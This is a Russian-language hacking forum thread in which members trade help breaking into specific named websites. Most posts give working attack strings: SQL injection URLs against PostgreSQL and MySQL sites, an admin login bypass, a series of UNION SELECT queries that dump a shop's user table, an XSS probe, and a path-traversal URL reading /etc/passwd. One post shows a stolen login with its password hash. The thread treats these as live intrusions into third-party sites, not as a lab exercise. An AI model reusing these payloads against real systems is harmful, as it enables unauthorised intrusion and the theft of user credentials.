Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. TELO

    TELO Member

    Joined:
    21 Jan 2009
    Messages:
    68
    Likes Received:
    44
    Reputations:
    6
    всё равно не выводит,ну да ладно....башка не варит уже
    спс
     
  2. sabe

    sabe Elder - Старейшина

    Joined:
    16 Mar 2007
    Messages:
    313
    Likes Received:
    178
    Reputations:
    14
    что за хеши?
     
  3. USAkid

    USAkid Elder - Старейшина

    Joined:
    17 Jun 2008
    Messages:
    191
    Likes Received:
    76
    Reputations:
    29
    на des похоже
     
  4. Артем Солнце

    Joined:
    19 Jan 2009
    Messages:
    9
    Likes Received:
    16
    Reputations:
    0
    скорее всего DES(Unix)
     
  5. R1dex

    R1dex Elder - Старейшина

    Joined:
    17 Sep 2008
    Messages:
    255
    Likes Received:
    132
    Reputations:
    19
    Конечно не выводит, это тебе не MYSQL, это PostgreSql. Почитай мануалы. Правильный запрос, чтобы посмотреть колонки, к примеру из таблы tk_users:

    Code:
    http://www.bookzone.com.ua/catalog.php?cid=-11028+union+select+COLUMN_NAME+FROM+INFORMATION_sCHEMA.COLUMNS+WHERE+TABLE_NAME=chr(116)||chr(107)||chr(95)||chr(117)||chr(115)||chr(101)||chr(114)||chr(115)+LIMIT+1+offset+0--
     
    #4825 R1dex, 22 Jan 2009
    Last edited: 22 Jan 2009
  6. TELO

    TELO Member

    Joined:
    21 Jan 2009
    Messages:
    68
    Likes Received:
    44
    Reputations:
    6
    Вот тоже скуль
    http://www.techcenter.com.ua/info3.php?id=17498%20order%20by%201%20--
    а дальше не пойму..
     
  7. TELO

    TELO Member

    Joined:
    21 Jan 2009
    Messages:
    68
    Likes Received:
    44
    Reputations:
    6
    а имя таблы обязательно в чаре?
     
  8. R1dex

    R1dex Elder - Старейшина

    Joined:
    17 Sep 2008
    Messages:
    255
    Likes Received:
    132
    Reputations:
    19
    Да.
     
  9. Артем Солнце

    Joined:
    19 Jan 2009
    Messages:
    9
    Likes Received:
    16
    Reputations:
    0
    Возможно в коде просто идет два запроса к БД подряд, по этому он и выдает The used SELECT statements have a different number of columns, попробуй использовать подзапросы
     
  10. Qam

    Qam New Member

    Joined:
    16 Jan 2009
    Messages:
    30
    Likes Received:
    3
    Reputations:
    0
    Парни,а мой вопрос утонул значит!Подскажите очень надо!
     
  11. Артем Солнце

    Joined:
    19 Jan 2009
    Messages:
    9
    Likes Received:
    16
    Reputations:
    0
    возможно да, кинь кусок исходника, где генерируется sid, а то так сложно угадать
     
  12. Qam

    Qam New Member

    Joined:
    16 Jan 2009
    Messages:
    30
    Likes Received:
    3
    Reputations:
    0
    $userdata = session_pagestart($user_ip, PAGE_LOGIN);
    init_userprefs($userdata);

    if ($sid == '' || $sid != $userdata['session_id'])
    {
    message_die(GENERAL_ERROR, 'Invalid_session');
    }

    $session_id = session_begin($row['user_id'], $user_ip, PAGE_INDEX, FALSE, $autologin, $admin);


    Вот куски кода могу весь выложить если нужно!!
     
  13. Артем Солнце

    Joined:
    19 Jan 2009
    Messages:
    9
    Likes Received:
    16
    Reputations:
    0
    по видимому тебе нужно знать IP пользователя и значение переменной $autologin для генерации сессии
     
  14. Snap

    Snap Elder - Старейшина

    Joined:
    5 Feb 2007
    Messages:
    61
    Likes Received:
    33
    Reputations:
    -4
    Помогите с проблемой есть сайтик "_http://www.nb-torg.ru/"

    CMS - CNStats 3.3

    Нашел такие проблемки в нем:
    XSS
    http://www.nb-torg.ru/search/?search="><script>alert("error");</script>

    и отсутствие фильтрации MySQL
    http://www.nb-torg.ru/gd/-17

    Что можно интересного придумать с SQL как разобрать если не сложно подскажите!

    Заранее спасибо!
     
  15. groundhog

    groundhog Elder - Старейшина

    Joined:
    12 May 2007
    Messages:
    1,159
    Likes Received:
    425
    Reputations:
    180
    Чего ты вот это морочишься... Мысли глобально... Заходи в админку:

    Логин: admin' OR 1=1#
    Пароль любой...

    Редирект не сработает, но если пораскинуть мозгами, можно тупо потом ввести:

    http://www.nb-torg.ru/admin/main.php

    вуаля - ты одмин

    З.Ы. Я поражен, неужели это CMS?
     
    #4835 groundhog, 22 Jan 2009
    Last edited: 22 Jan 2009
    2 people like this.
  16. groundhog

    groundhog Elder - Старейшина

    Joined:
    12 May 2007
    Messages:
    1,159
    Likes Received:
    425
    Reputations:
    180
    Да, это не основная админка, но опять же - учитесь мыслить глобально... У вас уже есть доступ в админку первого уровня... Она бажная... Находим в ней инъекцию и раскручиваем:

    http://www.nb-torg.ru/admin/adminers.php?action=edit&id=-1+UNION+SELECT+1,TABLE_NAME,3,4,5+FROM+INFORMATION_SCHEMA.TABLES+LIMIT+X,1--

    http://www.nb-torg.ru/admin/adminers.php?action=edit&id=-1+UNION+SELECT+1,CONCAT_WS(0x3a,TABLE_SCHEMA,TABLE_NAME),3,4,5+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+LIKE+'%25admin%25'+LIMIT+X,1--

    http://www.nb-torg.ru/admin/adminers.php?action=edit&id=-1+UNION+SELECT+1,CONCAT_WS(0x3a,TABLE_NAME,COLUMN_NAME),3,4,5+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME='cns_users'+LIMIT+X,1--

    http://www.nb-torg.ru/admin/adminers.php?action=edit&id=-1+UNION+SELECT+1,TABLE_NAME,3,4,5+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+LIKE+'%25user%25'+AND+TABLE_SCHEMA=DATABASE()+LIMIT+X,1--

    http://www.nb-torg.ru/admin/adminers.php?action=edit&id=-1+UNION+SELECT+1,CONCAT_WS(0x3a,ID,NAME,PASSWORD,EMAIL,ICQ),3,4,5+FROM+frb_users+LIMIT+X,1--
     
    #4836 groundhog, 22 Jan 2009
    Last edited: 22 Jan 2009
    1 person likes this.
  17. Snap

    Snap Elder - Старейшина

    Joined:
    5 Feb 2007
    Messages:
    61
    Likes Received:
    33
    Reputations:
    -4
    Остальное уже разобрал:

    http://www.nb-torg.ru/admin/adminers.php?action=edit&id=-1+UNION+SELECT+1,concat(login,char(58),password),3,4,5+FROM+db5971c.cns_users+limit+0,1--

    Единственный косяк с пассом не могу понять

    login: bolt
    pass: *8BB679C6BFDA0D1AAFC77A05A7A01DBFF48F10A5
     
  18. Артем Солнце

    Joined:
    19 Jan 2009
    Messages:
    9
    Likes Received:
    16
    Reputations:
    0
    MySQL5
     
  19. groundhog

    groundhog Elder - Старейшина

    Joined:
    12 May 2007
    Messages:
    1,159
    Likes Received:
    425
    Reputations:
    180
    Да... Что-то интересное...
     
  20. IIAPTUZAH

    IIAPTUZAH Banned

    Joined:
    15 Nov 2008
    Messages:
    26
    Likes Received:
    13
    Reputations:
    -10
    http://37-77.ru/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd

    Это как использовать???
     
Thread Status:
Not open for further replies.